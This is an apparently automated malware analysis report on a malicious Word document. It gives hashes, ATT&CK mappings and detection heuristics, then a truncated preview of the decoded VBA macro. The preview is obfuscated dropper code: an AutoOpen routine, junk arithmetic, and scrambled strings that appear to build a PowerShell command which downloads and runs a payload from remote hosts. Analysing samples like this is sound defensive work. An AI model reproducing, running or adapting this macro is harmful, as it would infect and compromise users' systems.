Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d4c4f3bbdc9ae9f6…

MALICIOUS

Office (OLE)

Size: 160.5 KB
Created: 2018-05-16 20:15:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 837a71153d0ba985a37ccd344427734f
SHA-1: 0b152cfa91d3970d0fa7978159f043c1ae1ab45c
SHA-256: d4c4f3bbdc9ae9f6b61aef2dfad86fdb31a61d65cc482276776a148586c7a2ed
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute external commands, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6546480-0' further supports this dropper functionality.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6546480-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6546480-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 140903 bytes
SHA-256: ea03eb7a0e7478727034129f1c4b6f234c6c5014f5843652666f4ad42c1a44af
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "jihwmrZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub HZuOw(kWXsM)
bHnJu = whHShZ
XIYkii = LTPZA + CDbl(50334 - dhHBzL - dVFKh + CDbl(42597)) - 36748 - CDbl(64730)
psVQZw = mpJLM
rOIUv = 35945
End Sub
Sub zQhNvu(TZAMid)
ahfJW = VVMpzp
dqBNa = ivYKH + CDbl(40310 - KsMpzd - kRjdLZ + CDbl(74982)) - 57016 - CDbl(57522)
sNGZJ = Xnlhvd
XXoqU = 56869
XsWFk = KYBBN
RUStO = APoBL + CDbl(92125 - HPIFXi - AVjzr + CDbl(1946)) - 78701 - CDbl(96193)
zljUq = jFdal
NUVja = 35090
wBSiTv = woSCN
CzpPb = wviDbz + CDbl(94471 - mBKSQi - BQhHQ + CDbl(48140)) - 74176 - CDbl(28984)
mbNUQP = FFwVhN
qhWwSv = 56458
End Sub
Sub liFBh(HLCKj)
QAjchW = FNSNd
SqaucU = PmpiO + CDbl(30224 - WztwLB - hqztP + CDbl(91551)) - 48450 - CDbl(46617)
TRbMPR = RapMbd
AORoz = 13742
WBcRk = dAMYu
zWRnCS = QcVVo + CDbl(91883 - fwfzH - RTzPz + CDbl(91356)) - 59797 - CDbl(33367)
QNQSk = ojaOVu
qAfnVj = 40270
End Sub
Sub Autoopen()
On Error Resume Next
VPRUZj = CnHnn
LIFWL = rNEimf + CDbl(51473 - wjLZww - vwzzK + CDbl(94804)) - 29016 - CDbl(62796)
HhGdfs = RKGdTQ
fpzEcS = 54977
pKSwvjuQrtXRc (prqQJF + vzXJmBbOws + AccjR)
EZzzEI = PsSCiR
ILtmN = asPmP + CDbl(66723 - tJdBn - FaQBGX + CDbl(18995)) - 67632 - CDbl(33827)
YnlrlQ = jpSGBM
KiVoA = 12555
End Sub
Sub QPfMt(KmPDbI)
qzirjd = tMUsE
GqYBV = LjIYFi + CDbl(84210 - fzaOf - QTLEiF + CDbl(43634)) - 74007 - CDbl(42241)
vnIjm = ONisz
iaYMr = 11003
wmFMLz = iUWQMY
DcRWL = LiMjnv + CDbl(2573 - kfSNQz - Rpazi + CDbl(99569)) - 77918 - CDbl(88181)
RfYEiz = qfUdN
YZQvB = 88367
ECvalm = rYclXo
PHWzG = YciwUL + CDbl(84426 - Bhmwu - lOkzS + CDbl(84850)) - 20281 - CDbl(29911)
CiFYD = RtwuG
cUwGZ = 89151
End Sub
Sub prpmc(kAXYiO)
JKfNOn = GjnoEn
Jtlrtz = ZaNvdo + CDbl(36351 - uVUfi - Rpkrm + CDbl(11146)) - 30580 - CDbl(11014)
Bipva = mhlRo
kSSlwV = 94451
End Sub

Attribute VB_Name = "STZJhsEAzGrXU"
Sub LNots(IojOp)
jXSFo = SPliJf
hBlhi = QPOGE + CDbl(95485 - dthij - TKMjh + CDbl(88372)) - 34702 - CDbl(15087)
EldEI = KBWGFp
ISQOI = 68620
End Sub
Function vzXJmBbOws()
On Error Resume Next
YhGww = DVVEn
RLKdd = pYSsL + CDbl(45022 - VuBuQT - iAjWii + CDbl(11249)) - 91956 - CDbl(56500)
jSTsXN = pnNSLo
WjUcSB = 52574
LKflfi = TYwQw
nIiTvB = MdpRR + CDbl(94817 - oJFRsT - kDkhXi + CDbl(25779)) - 15324 - CDbl(55341)
IWNFIh = QKQahV
TiiOJ = 37508
NTHuDznEbC = UkFHd("tN%49X 7R9+7R9+7R9+7R9 7R9+7R9D7R9+7R9x96TDDx97R9+7R9 7R9+7R9+'+'7R9+7R9 c7R9+7R'+'9ilbu7R9+7R9p:7R9+7R9vn7R9+7R9eL97R9+7R9X = '+'7R9+7R9CDSL9X7R9+7R9;7R9+7R9)D7R9+7R9x9@7R9+7R9Dx97R9v39j", 75139 + 5 - 75139, 75139 + 179 - 75139)
XdtCFu = XWGEAz
vkqfb = BhCMC + CDbl(65624 - Opwzw - KksTC + CDbl(6398)) - 75708 - CDbl(967)
nKWhXD = wriiA
qbhAWX = 44779
paiaoS = BKWbJ
iuXUKv = rLZId + CDbl(97642 - DRJVsY - tRBlQ + CDbl(29709)) - 68147 - CDbl(40187)
UGwiCj = bNufp
AVzpjE = 68788
uWZJF = UkFHd("Euf9D7R9+7R9x97R9+7R9kDx7R'+'9+7R99+Dx9o7R9+7R9v7R9+7R9n7R9+7R9I7R9+mv7o5", 66247 + 6 - 66247, 66247 + 65 - 66247)
Bjkjo = ViufjW
EBfPjU = iHzsb + CDbl(29877 - fobii - fTXNCN + CDbl(10763)) - 86861 - CDbl(86608)
OwSwv = RZwjh
ulsEZ = 25135
KVXoL = fjSkXC
zYbkGk = NzwCw + CDbl(85678 - RnVkuU - iIzczh + CDbl(3343)) - 5940 - CDbl(90037)
ZMCWh = BKSbE
XUqSd = 26777
PiYvpdmWGJz = UkFHd("pv+7R9(tilp7R9+7R9S7R9+7R9.Dx7R'+'9+7R99/7R9+'+'7R9d7R9+7R9nfJyd7R9+7R9p'+'R7R9+7R9/7R9+7R9gro.o7R9+7R9tosle//:ptt7R9+7R9h@/7R9+7R9aovij/moc.bmotof/7R9+jhfl31", 81227 + 7 - 81227, 81227 + 150 - 81227)
wAdinR = bIHCw
Crcmq = jZTZbt + CDbl(76245 - kfljE - HzGvdO + CDbl(9430)) - 34752 - CDbl(73954)
DQcuKj = EcCiWd
CoAwiw = 44127
CQHVM = jDWRYV
YdnShn = KwaEh + CDbl(32543 - HVaDST - kCGrSR + CDbl(44493)) - 81719 - CDbl(42568)
djUCFO = PNPPE
CovwYi = 92661
nXYDjFzAdo = UkFHd("uO7R9tcejbo-Dx7R9+7R99+D7R9+7R9x9w7R9+7R9D7R9+7R9x7R9+7R997R9+7R9+Dx7R9+7R99e7R9+7R9n7R9+7R9Dx7R9+7R99(7R9PXrM", 52581 + 
... (truncated)